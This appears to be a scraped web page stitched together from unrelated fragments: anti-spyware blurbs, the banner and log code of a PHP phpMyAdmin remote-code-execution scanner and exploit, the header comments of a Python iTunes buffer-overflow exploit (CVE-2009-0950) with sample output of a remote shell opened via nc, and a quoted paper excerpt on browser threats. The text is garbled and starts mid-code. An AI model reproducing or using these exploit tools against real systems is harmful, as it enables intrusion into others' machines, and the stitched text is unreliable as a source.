Make sure it gets the latest spyware definitions.
Scanned real malicious files and it works!
Customize your personal settings
Memory footprint as observed in Process Explorer
1) {
print "|****************************************************************|\n";
print " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n";
print " phpMyAdmin Code Injection RCE Scanner & Exploit\n";
print " This is PHP version original http://milw0rm.com/exploits/8921\n";
print " credit: Greg Ose, pagvac @ gnucitizen.org\n";
print " greetz: Hacking Expose!, HM Security, darkc0de\n";
print "|****************************************************************|\n";
print "\n";
print "Usage: php $argv[0] \n";
exit;
}
print "|****************************************************************|\n";
print " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n";
print " phpMyAdmin Code Injection RCE Scanner & Exploit\n";
print " This is PHP version original http://milw0rm.com/exploits/8921\n";
print " credit: Greg Ose, pagvac @ gnucitizen.org\n";
print " greetz: Hacking Expose!, HM Security, darkc0de\n";
print "|****************************************************************|\n";
print "\n";
$Handlex = fopen("pmaPWN.log", "a+");
fwrite($Handlex, "|****************************************************************|\n");
fwrite($Handlex, " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n");
fwrite($Handlex, " phpMyAdmin Code Injection RCE Scanner & Exploit\n");
fwrite($Handlex, " This is PHP version original http://milw0rm.com/exploits/8921\n");
fwrite($Handlex, " credit: Greg Ose, pagvac @ gnucitizen.org\n");
fwrite($Handlex, " greetz: Hacking Expose!, HM Security, darkc0de\n");
fwrite($Handlex, "|****************************************************************|\n\n");

#!/usr/bin/python
# Apple iTunes 8.1.1.10 itms/itcp BOF Windows Exploit
# www.offensive-security.com/blog/vulndev/itunes-exploitation-case-study/
# Matteo Memelli | ryujin __A-T__ offensive-security.com
# Spaghetti & Pwnsauce - 06/10/2009
# CVE-2009-0950 http://dvlabs.tippingpoint.com/advisory/TPTI-09-03
#
# The vulnerability can't be exploited by simply overwriting a return address on the
# stack because of stack canary protection. Increasing the buffer size leads to an
# SEH overwrite, but it seems that the Access Violation needed to get our own
# Exception Handler called is not always thrown.
# So, to increase reliability, the exploit sends two URIs to iTunes:
# - the 1st payload corrupts the stack (it doesn't overwrite the cookie, no crash)
# - the 2nd payload fully overwrites SEH to 0wN EIP
# Payloads must be encoded in order to obtain pure ASCII printable shellcode.
# I could trigger the vulnerability from Firefox but not from IE, which seems
# to truncate the long URI.
# Tested on Windows XP SP2/SP3 English, Firefox 3.0.10,
# iTunes 8.1.1.10, 8.1.0.52
#
# --> hola hola ziplock, my Apple Guru! ;) && cheers to muts... he knows why
#
# ryujin:Desktop ryujin$ ./ipwn.py
# [+] iTunes 8.1.10 URI Bof Exploit Windows Version CVE-2009-0950
# [+] Matteo Memelli aka ryujin __A-T__ offensive-security.com
# [+] www.offensive-security.com
# [+] Spaghetti & Pwnsauce
# [+] Listening on port 80
# [+] Connection accepted from: 172.16.30.7
# [+] Payload sent, wait 20 secs for iTunes error!
# ryujin:Desktop ryujin$ nc -v 172.16.30.7 4444
# Connection to 172.16.30.7 4444 port [tcp/krb524] succeeded!
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Mozilla Firefox>
Web Browsers: An Emerging Platform Under Attack
“The widespread use of highly interactive “rich client” web applications for e-commerce, business networking, and online collaboration has finally catapulted web browsers from straightforward HTML viewers to a full-blown software platform. And as corporate users are performing a significant portion of their work on the web, whether it’s researching or collaborating, the safety of the underlying platform is critical to the company’s success.”
Other areas the paper covers include:
• The shift in spam to mainly malicious web link usage
• “Web 2.0” sites—whether weblogs, social networking or portal sites—are increasingly spammed with links to malicious sites
• Legitimate sites are compromised and misused to either host malicious code or link to a malicious website
• Use of malicious video banners placed in advertisement networks
• Use of popular search terms to advertise and drive (search query) traffic to a malicious website. In a recent case in Germany, attackers used Google AdWords to attract users who searched for “flash player” to the attacker’s fake Adobe-look-alike site